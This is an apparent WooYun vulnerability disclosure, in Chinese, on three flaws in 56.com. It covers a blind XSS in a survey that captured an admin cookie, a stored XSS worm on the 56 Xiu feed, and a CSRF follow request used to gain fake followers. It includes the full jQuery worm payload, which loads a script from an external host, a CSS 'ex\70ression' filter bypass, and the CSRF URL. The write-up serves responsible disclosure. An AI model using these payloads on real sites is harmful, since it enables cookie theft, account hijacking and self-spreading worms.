WooYun.org

漏洞一：56网视频小镇问卷调查xss盲打。
1 问卷调查地址：

http://huodong.56.com/2013/diaocha/index.php?id=25

问卷调查的内容中，存在有输入框的位置没有过滤xss，可以插xss盲打后台。

2 成功收到管理员的cookie。

3 由于下午4点收到的cookie，而我是晚上10点才看到，所以后台cookie已经失效了（也有可能是他那边退出登录了）。

4 但是前台还是可以登录额。

漏洞二：56我秀首页 发布新鲜事 储存xss，可以蠕虫。
1 56秀地址：

http://xiu.56.com/

发布新鲜事位置，的图片src属性没有过滤"和onxxx

2 发布一条带有图片的新鲜事，抓包如下（post数据）：

http://xiu.56.com/index.php?action=SnsApi&do=Publish
text	
img   http://c.p313.56img.com/photo2video/upImg/d1/68/2/thumb_kjtest09_5194f16315b20269.jpg
t	0.9721063207834959
isdefault	1
newyear_topic	0
video

然后修改post数据包为下图，插入xss代码。

3 可以看到成功的种植了调用外部js的xss代码。

4 试试抓下cookie，ok完全无压力。

5 试试蠕虫利用。
外部js文件中代码为（网站有调用jq）：

jQuery.post("http://xiu.56.com/index.php?action=SnsApi&do=Publish",{
	"text":"",	
	"img":"http://c.p313.56img.com/photo2video/upImg/d1/68/2/thumb_kjtest09_5194f16315b20269.jpg\" onload=\"with(document)body.appendChild(createElement('script')).src='//px1624.sinaapp.com/t.js'",
	"t":"0.9721063207834959",
	"isdefault":1,
	"newyear_topic":0,
	"video":""	
})

换个浏览器换自己帐号去测试（刚才一直都是用那个xss到的管理账户在试）。
成功发布了一条带有xss蠕虫的图片的新鲜事。

6 这个漏洞我在提交乌云之前私下告诉了56乌云管理人员，当时说好，先不修补，等我截图完了再修。
没想到有的图我都没截，他就给修补了。
将onxxx过滤成了on<x>xxx，同时过滤了一些其他的关键字，以及图片地址判断了后缀等。

目前新鲜事首页的xss已经被修补了，不过不得不说56安全人员的安全意识啊（估计是直接随便弄了个过滤xss的js文件调用了一下），修补后照片墙位置的xss蠕虫还在。
我在提交乌云之前，又一次好心的去告诉了下他，所以不知道这个位置的现在还存在没。
照片墙测试地址：

http://xiu.56.com/index.php?action=Sns&do=photoWall&uid=kjtest09

而且这种修补治标不治本，我随便试了试，又给绕过了，不好意思。
利用style的expression，虽然这里expression也被过滤为了ex<x>pression。
但是重要的是，这里没有过滤 \ ，反斜线， 而 css里，允许使用转义字符, \ + ascii16进制形式。这样一来，我们就可以构造利用语句啦。
将expression写成ex\70ression即可成功绕过。至于那个后缀的判断，直接post数据后面多加个 .jpg 就给绕过了额。。。

看了一下，网站源码中还有句这个，就是把所有的IE浏览器都当作是IE7来执行，所以这个expression的xss就通杀所有的IE浏览器了。

下面是IE10下的成功xss弹窗。

诶，这。。。这岂不是又可以继续蠕虫了。
漏洞不可怕，可怕的就是厂商错误的修补。然后漏洞被公开后，被恶意份子进行了二次利用。
漏洞三：56我秀加关注csrf刷粉丝。
1 位置就是任意位置点击加关注。

2 抓包发现加关注是个get请求，具体形式如下，很明显可以用来刷粉丝。

http://xiu.56.com/index.php?action=SnsApi&do=DoFollow&attr=follow&t=0.8027756286319345&follow_user_id=用户名

3 去发个带有csrf的图，然后用另外一个帐号去访问那个会显示图片的地址。

4 成功执行了csrf，关注成功。

不一会儿，一大波粉丝就来了额。。